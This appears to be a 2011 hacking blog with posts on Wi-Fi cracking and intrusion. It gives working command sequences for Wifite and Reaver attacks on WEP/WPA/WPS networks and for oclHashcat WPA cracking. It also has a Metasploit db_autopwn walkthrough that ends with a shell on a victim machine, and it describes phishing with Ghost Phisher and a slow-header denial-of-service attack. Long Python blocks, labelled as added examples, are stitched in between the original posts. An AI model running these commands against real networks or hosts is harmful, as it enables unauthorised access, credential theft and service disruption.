Saturday, 31 December 2011

Automated Mass WPA / WEP Hacker with Wifite (wifite.py)

The purpose of the tool is to attack multiple WEP- and WPA-encrypted networks at the same time; it can be fully automated with only a few command-line arguments.

Features:

  • sorts targets by power (in dB); cracks closest access points first
  • automatically deauths clients of hidden networks to decloak SSIDs
  • numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
  • customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
  • "anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
  • all WPA handshakes are backed up to wifite.py's current directory
  • smart WPA deauthentication -- cycles between all clients and broadcast deauths
  • stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
  • switching WEP attack methods does not reset IVs
  • Intel 4965 chipset fake-authentication support; uses a wpa_supplicant workaround
  • SKA support (untested)
  • displays session summary at exit; shows any cracked keys
  • all passwords saved to log.txt
  • built-in updater: ./wifite.py -upgrade

Friday, 30 December 2011

SIOCSIFFLAGS: Unknown error 132 message

If you are running BackTrack 5 or BackTrack 5 R1 inside VMware with a USB Wi-Fi device based on the RTL8187 chipset (e.g. the ALFA AWUS036H), you will probably run into this error message:

airmon-ng start wlan0

SIOCSIFFLAGS: Unknown error 132 message



To solve this issue, use the following commands:

prepare-kernel-sources

cd /usr/src/linux/drivers/net/wireless/rtl818x/rtl8187/

wget http://backtrack-linux.org/silly-rfkill-patch.patch

patch -p0 < silly-rfkill-patch.patch

cd /usr/src/linux

make drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko

cp drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko /lib/modules/2.6.39.4/kernel/drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko

After that, reboot your VMware/BackTrack guest and the issue is solved.

Reaver 1.2 WPS Brute Force Cracker to recover Passphrase

NEW Reaver 1.4 Tutorial


http://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.html

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute-force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.

On average, Reaver will recover the target AP's plain-text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS PIN and recover the passphrase.

Prerequisites

  • You must be running Linux.
  • You must have a wireless card capable of raw injection.
  • You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Monday, 26 December 2011

How to Convert Your .cap File to .hccap for Use with oclHashcat for WPA



Upload your .cap file to the following cap2hccap conversion service:

http://hashcat.net/cap2hccap/

Then use oclHashcat-plus to crack it. The command for use with ATI GPUs:

Open a command prompt (DOS box) and use the following command line:

C:\oclHashcat-plus-0.06\oclHashcat-plus64.exe -m 2500 D:\oclHashcat-plus-0.06\1.hccap D:\oclHashcat-plus-0.06\wpa.txt


  • -m 2500  -> selects the WPA hash mode, i.e. we want to crack a WPA file
  • wpa.txt   -> your dictionary / wordlist file


Note:

If you run into problems with opencl.dll, download the latest ATI Catalyst drivers, select the ATI SDK during installation and install it; this works without a reboot.
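Before handing a converted file to oclHashcat (or to anyone else), it is worth checking that the conversion actually produced a usable handshake. The following validator is an added example, not code from the original post or from the hashcat project; it parses the .hccap layout as hashcat documents it (a fixed 392-byte record per handshake: essid, two MACs, two nonces, the EAPOL frame, its length, the key version and the key MIC) and reports obvious defects such as an empty ESSID, an out-of-range EAPOL length or an all-zero MIC. Which of the two MACs is the AP and which the client is not checked here, and the sample record at the bottom is constructed for the demo.

```python
"""Offline sanity check for .hccap files (added example; layout follows
hashcat's documented hccap_t structure, 392 bytes per handshake)."""
import struct

# essid[36] mac1[6] mac2[6] nonce1[32] nonce2[32] eapol[256] eapol_size keyver keymic[16]
HCCAP = struct.Struct("<36s6s6s32s32s256sii16s")
HCCAP_SIZE = HCCAP.size   # 392 bytes


def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_hccap(blob):
    """Split a .hccap blob into one dict per handshake. Each dict carries a
    'problems' list that is empty when the record looks usable."""
    if not blob or len(blob) % HCCAP_SIZE:
        raise ValueError(f"hccap must be a non-empty multiple of {HCCAP_SIZE} bytes, got {len(blob)}")
    records = []
    for off in range(0, len(blob), HCCAP_SIZE):
        (essid_raw, mac1, mac2, nonce1, nonce2,
         eapol, eapol_size, keyver, keymic) = HCCAP.unpack_from(blob, off)
        essid_bytes = essid_raw.split(b"\x00", 1)[0]
        problems = []
        if not essid_bytes or len(essid_bytes) > 32:
            problems.append("essid empty or longer than 32 bytes")
        if not 0 < eapol_size <= 256:
            problems.append(f"eapol_size {eapol_size} outside 1..256")
        if keyver not in (1, 2):
            problems.append(f"keyver {keyver} is neither 1 (WPA) nor 2 (WPA2)")
        for name, mac in (("mac1", mac1), ("mac2", mac2)):
            if mac in (b"\x00" * 6, b"\xff" * 6):
                problems.append(f"{name} is the null or broadcast address")
        if mac1 == mac2:
            problems.append("mac1 and mac2 are identical")
        if nonce1 == b"\x00" * 32 or nonce2 == b"\x00" * 32:
            problems.append("a nonce is all zero")
        if keymic == b"\x00" * 16:
            problems.append("keymic is all zero")
        records.append({
            "essid": essid_bytes.decode("utf-8", "replace"),
            "mac1": _mac(mac1),
            "mac2": _mac(mac2),
            "keyver": keyver,
            "eapol_size": eapol_size,
            "eapol": eapol[:max(0, min(eapol_size, 256))],
            "keymic": keymic.hex(),
            "problems": problems,
        })
    return records


def build_hccap_record(essid, mac1, mac2, nonce1, nonce2, eapol, keyver, keymic):
    """Pack one record. Used here only to construct sample input."""
    return HCCAP.pack(essid.encode(), mac1, mac2, nonce1, nonce2,
                      eapol.ljust(256, b"\x00"), len(eapol), keyver, keymic)


# Constructed sample: one WPA2 (keyver 2) handshake with dummy nonces and MIC.
SAMPLE_HCCAP = build_hccap_record(
    "TestNet",
    bytes.fromhex("001122334455"),
    bytes.fromhex("66778899aabb"),
    bytes(range(32)),
    bytes(range(32, 64)),
    bytes.fromhex("0203007502") + b"\x11" * 116,   # EAPOL-Key header + dummy body
    2,
    b"\x0f" * 16,
)

if __name__ == "__main__":
    for rec in parse_hccap(SAMPLE_HCCAP):
        status = "ok" if not rec["problems"] else "; ".join(rec["problems"])
        print(f'{rec["essid"]} {rec["mac1"]} <-> {rec["mac2"]} keyver={rec["keyver"]} {status}')
```

To check a real file, read it with `open(path, "rb").read()` and pass the bytes to `parse_hccap`; a length that is not a multiple of 392 means the conversion or download was truncated.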

Saturday, 24 December 2011

Strip WPA2 Handshake with Wireshark


How to strip your handshake with Wireshark:


  • Open your capture in Wireshark.
  • Enter "eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08" as the filter expression (without the quotes), then press "Apply".
  • Go to File -> Save As..., enter a new file name and select "Displayed" to save only the filtered packets.
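To see exactly which frames that filter keeps (and therefore what remains in the stripped file), here is an added example that re-implements its three clauses in Python; it is not part of the original post or of Wireshark. In Wireshark's wlan.fc.type_subtype encoding, which is (type << 4) | subtype, 0x04 is a probe request and 0x08 a beacon; "eapol" matches unencrypted data frames whose LLC/SNAP ethertype is 0x888E. The code assumes raw 802.11 frames with any radiotap/PPI header already removed, and the MAC addresses and frames at the bottom are constructed for the demo.

```python
"""Re-implementation of the display filter
    eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08
over raw 802.11 frames (added example, constructed sample data)."""
import struct

ETHERTYPE_EAPOL = 0x888E
LLC_SNAP = b"\xaa\xaa\x03\x00\x00\x00"   # LLC/SNAP header that precedes the ethertype
PROBE_REQUEST = 0x04
BEACON = 0x08


def fc_type_subtype(frame):
    """Wireshark's wlan.fc.type_subtype: (type << 4) | subtype, taken from the
    first frame-control byte (bits 2-3 = type, bits 4-7 = subtype)."""
    b0 = frame[0]
    return (((b0 >> 2) & 0x3) << 4) | ((b0 >> 4) & 0xF)


def is_eapol(frame):
    """True for an unencrypted data frame whose LLC/SNAP ethertype is 0x888E."""
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 2 or subtype & 0x4:      # not a data frame, or a "no data" subtype
        return False
    flags = frame[1]
    if flags & 0x40:                     # Protected bit set: payload is encrypted
        return False
    hdr = 24
    if (flags & 0x03) == 0x03:           # ToDS and FromDS: four-address header
        hdr += 6
    if subtype & 0x8:                    # QoS data: two-byte QoS control field
        hdr += 2
    llc = frame[hdr:hdr + 8]
    if len(llc) < 8 or llc[:6] != LLC_SNAP:
        return False
    return struct.unpack("!H", llc[6:])[0] == ETHERTYPE_EAPOL


def classify(frame):
    """Label a frame the way the filter would, or None if the filter drops it."""
    if is_eapol(frame):
        return "eapol"
    ts = fc_type_subtype(frame)
    if ts == PROBE_REQUEST:
        return "probe request"
    if ts == BEACON:
        return "beacon"
    return None


def strip_capture(frames):
    """Return (index, label) for every frame the filter keeps."""
    kept = []
    for i, frame in enumerate(frames):
        label = classify(frame)
        if label:
            kept.append((i, label))
    return kept


# --- constructed sample frames -------------------------------------------
AP = bytes.fromhex("001122334455")      # constructed BSSID
STA = bytes.fromhex("66778899aabb")     # constructed client MAC
BCAST = b"\xff" * 6


def mgmt_frame(subtype, addr1, addr2, body=b""):
    fc0 = (subtype << 4) | (0 << 2)                  # type 0 = management
    return bytes([fc0, 0x00]) + b"\x00\x00" + addr1 + addr2 + AP + b"\x00\x00" + body


def data_frame(payload, flags):
    fc0 = (8 << 4) | (2 << 2)                        # type 2 = data, subtype 8 = QoS data
    hdr = bytes([fc0, flags]) + b"\x00\x00" + STA + AP + AP + b"\x00\x00" + b"\x00\x00"
    return hdr + payload


# EAPOL-Key message with a zeroed body (version 2, type 3 = Key, length 0x5f)
EAPOL_MSG1 = LLC_SNAP + struct.pack("!H", ETHERTYPE_EAPOL) + bytes.fromhex("0203005f") + b"\x00" * 0x5F

SAMPLE_FRAMES = [
    mgmt_frame(8, BCAST, AP, body=b"\x00" * 12 + b"\x00\x07TestNet"),      # beacon with SSID
    mgmt_frame(4, BCAST, STA),                                             # probe request
    mgmt_frame(5, STA, AP),                                                # probe response
    data_frame(EAPOL_MSG1, flags=0x02),                                    # EAPOL, FromDS
    data_frame(LLC_SNAP + b"\x08\x00" + b"\x45" + b"\x00" * 19, flags=0x02),  # IPv4 data
    data_frame(b"\x00" * 40, flags=0x42),                                  # protected data
]

if __name__ == "__main__":
    print(strip_capture(SAMPLE_FRAMES))
```

Only the beacon, the probe request and the EAPOL frame survive; probe responses, ordinary IP traffic and encrypted data frames are dropped, which is why the saved file contains little beyond the SSID advertisement and the handshake itself.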

Tuesday, 13 December 2011

Easy Apache / IIS Slow Header Attack



Slow Header Attack

The slow header attack exploits the client idle timeout on the server side. This timeout is configured on the server to drop a client connection that has been idle for the whole interval. The attack first finds the approximate timeout value configured on the server and then chooses a send interval that is lower than that value. It then opens an HTTP request with a partial header and keeps sending one further header line per interval; the client idle timeout is never triggered on the server side and the request never completes.

In essence, a single laptop, even behind a proxy, can mount a denial-of-service attack against a website.
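The reason the idle timeout alone does not help, and what does, can be seen in a small model. The following is an added example, not code from the original post: it replays two constructed connection patterns (a normal browser and the one-header-line-per-interval pattern described above) against two server policies. The first policy is the plain idle timeout the post talks about; the second gives the whole request header a deadline that is extended only when data keeps arriving at a minimum rate, which is the idea behind Apache's mod_reqtimeout directive `RequestReadTimeout header=20-40,MinRate=500`. All timing values below are constructed for the demo.

```python
"""Idle timeout versus header deadline against a slow-header client
(added example with constructed traffic patterns)."""

HEADER_END = b"\r\n\r\n"   # a request header is complete once this arrives


def idle_timeout_verdict(chunks, idle_timeout):
    """Idle-timeout policy: drop the connection only when the gap between two
    received chunks exceeds idle_timeout seconds.
    chunks: list of (seconds_since_connect, bytes_received).
    Returns ("accepted", t), ("dropped", t) or ("still_open", t_last)."""
    last, data = 0.0, b""
    for t, chunk in chunks:
        if t - last > idle_timeout:
            return ("dropped", last + idle_timeout)
        last, data = t, data + chunk
        if HEADER_END in data:
            return ("accepted", t)
    return ("still_open", last)           # connection is still tying up a slot


def header_deadline_verdict(chunks, initial, maximum, min_rate):
    """Header-deadline policy: the client gets `initial` seconds to finish the
    header; every `min_rate` bytes received extend the deadline by one second,
    never beyond `maximum` seconds in total.
    Returns ("accepted", t) or ("dropped", deadline)."""
    deadline, data = float(initial), b""
    for t, chunk in chunks:
        if t > deadline:
            return ("dropped", deadline)
        data += chunk
        if HEADER_END in data:
            return ("accepted", t)
        deadline = min(float(maximum), deadline + len(chunk) / min_rate)
    return ("dropped", deadline)          # chunks ran out, header never completed


# Constructed traffic patterns: (seconds since connect, bytes received)
NORMAL_CLIENT = [
    (0.05, b"GET / HTTP/1.1\r\nHost: example.test\r\n"),
    (0.12, b"User-Agent: demo\r\nAccept: */*\r\n\r\n"),
]
# Partial header, then one more header line every 100 s (below a 300 s idle
# timeout), and never the blank line that would complete the request.
SLOW_CLIENT = [(0.0, b"GET / HTTP/1.1\r\nHost: example.test\r\n")] + [
    (100.0 * i, b"X-a: b\r\n") for i in range(1, 11)
]


def compare_policies(chunks, idle_timeout=300, initial=20, maximum=40, min_rate=500):
    """Verdict of both policies for one connection pattern."""
    return {
        "idle_timeout": idle_timeout_verdict(chunks, idle_timeout),
        "header_deadline": header_deadline_verdict(chunks, initial, maximum, min_rate),
    }


if __name__ == "__main__":
    for name, conn in (("normal", NORMAL_CLIENT), ("slow", SLOW_CLIENT)):
        print(name, compare_policies(conn))
```

With a 300 s idle timeout the slow connection is never dropped (each gap is only 100 s), while the header-deadline policy closes it shortly after 20 s because the 36 bytes received extend the deadline by a mere 0.072 s; the normal client is accepted by both policies in a fraction of a second.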


How to own a Windows XP SP3 Box with Metasploit / Backtrack.

Tutorial: Metasploit DB Autopwning

Commands:

/etc/init.d/postgresql-8.3 start # start the database
msfconsole # start Metasploit

db_connect pentest # connect to the database
db_nmap <host IP or hostname> # scan for open ports
db_autopwn -e -p # -e = exploit all matched targets, -p = select attacks based on open ports

Wait until a Meterpreter session opens, like:

[*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)

Wait until the attack is over, or press Ctrl+C to terminate it.

Now:

sessions # shows your connections to the victim
sessions -i 1 # interact with session 1
shell # opens a shell on the victim

Use the help command to get information about the other available commands.

FOR EDUCATIONAL PURPOSES ONLY



HexorBase - The Database Hacker Tool

HexorBase is capable of connecting to any remotely accessible database and performing SQL queries and brute-force attacks against:
MySQL, Oracle, SQLite, SQL Server and PostgreSQL

Phishing Attacks with GUI powered Ghost Phisher Fake DNS, Fake DHCP, Fake Webserver

Ghost Phisher is a computer security application that comes with a built-in fake DNS server, fake DHCP server and fake HTTP server, and has an integrated area for automatically capturing and logging HTTP form credentials to a database. The program can be used as a honeypot, to serve DHCP and DNS requests, or for phishing attacks.

Friday, 7 October 2011

How to allow root user ssh access

How to grant the root user SSH access

Command line:


sed -e 's/PermitRootLogin no/PermitRootLogin yes/' -i /etc/ssh/sshd_config
/sbin/service sshd reload

This allows SSH access for the user "root".
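The sed one-liner only fires when the file contains the exact text "PermitRootLogin no"; if the directive is commented out or missing, sed changes nothing and the reload silently keeps the previous behaviour. The function below is an added example (not from the original post) that sets the directive robustly: it replaces the first occurrence whether active or commented, comments out later global duplicates (sshd uses the first value it finds), and inserts the line before the first Match block when the keyword is absent, because a directive placed after Match applies only to that block. The sample configurations are constructed; on a real host run `sshd -t` before reloading, and consider `PermitRootLogin prohibit-password` (OpenSSH 7.0 and later) if only key-based root logins are needed.

```python
"""Idempotent edit of an sshd_config directive in the global section
(added example with constructed sample configs)."""
import re

MATCH_RE = re.compile(r"^\s*Match\b", re.IGNORECASE)


def _directive_re(key):
    # keyword, optionally commented out, followed by whitespace, '=' or end of line
    return re.compile(r"^\s*#?\s*" + re.escape(key) + r"(\s|=|$)", re.IGNORECASE)


def split_global_section(text):
    """Return (global_lines, match_lines): everything before the first Match
    block, and the Match block(s) themselves."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if MATCH_RE.match(line):
            return lines[:i], lines[i:]
    return lines, []


def effective_value(text, key):
    """Value sshd would use globally: the first active occurrence before any
    Match block, or None when the built-in default applies."""
    rx = _directive_re(key)
    for line in split_global_section(text)[0]:
        stripped = line.strip()
        if stripped.startswith("#") or not rx.match(line):
            continue
        parts = re.split(r"[\s=]+", stripped, maxsplit=1)
        return parts[1].strip() if len(parts) > 1 else ""
    return None


def set_global_directive(text, key, value):
    """Set `key value` exactly once in the global section and return the new text."""
    rx = _directive_re(key)
    global_lines, match_lines = split_global_section(text)
    out, done = [], False
    for line in global_lines:
        if rx.match(line):
            if not done:
                out.append(f"{key} {value}")      # first occurrence: active or commented
                done = True
            elif not line.strip().startswith("#"):
                out.append("#" + line)           # later active duplicate would never win, but keep it inert
            else:
                out.append(line)
            continue
        out.append(line)
    if not done:
        out.append(f"{key} {value}")             # absent: add before any Match block
    return "\n".join(out + match_lines) + "\n"


# Constructed sample: directive commented out globally, set to "no" in a Match block.
SAMPLE_CONFIG = (
    "# sshd_config (constructed sample)\n"
    "#PermitRootLogin prohibit-password\n"
    "PasswordAuthentication yes\n"
    "Match User backup\n"
    "    PermitRootLogin no\n"
)

if __name__ == "__main__":
    print("before:", effective_value(SAMPLE_CONFIG, "PermitRootLogin"))
    updated = set_global_directive(SAMPLE_CONFIG, "PermitRootLogin", "yes")
    print("after: ", effective_value(updated, "PermitRootLogin"))
    print(updated)
```

Read /etc/ssh/sshd_config, pass its text through `set_global_directive`, write it back and reload; the same function with the value `no` reverts the change.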

Lancom Commands

  • trace + all -> switches on all trace output
  • trace - all -> switches off all trace output
  • trace + protocol display -> switches on the output of all connection protocols and of the status and error messages
  • trace + all - icmp -> switches on all trace output except for the ICMP protocol
  • trace ppp -> shows the state of the PPP
  • trace # ipx-rt display -> toggles the trace output of the IPX router and the display output
  • trace + ip-router @ GEGENSTELLE-A GEGENSTELLE-B -> switches on the IP router output for everything that relates to remote sites A or B
  • trace + ip-router @ GEGENSTELLE-A GEGENSTELLE-B -ICMP -> switches on the IP router output for everything that relates to remote sites A or B and does not use ICMP
  • trace + ip-router @ +TCP + "port: 80" -> switches on the IP router output for everything that uses TCP/IP and port 80. "port: 80" is put in quotation marks so that the space is included as part of the string.
  • trace + vpn-status display -> switches on the output of a VPN status trace. The display parameter additionally provides status and error output.

GEGENSTELLE-A and GEGENSTELLE-B stand for the names of the remote sites (Gegenstellen) configured on the router.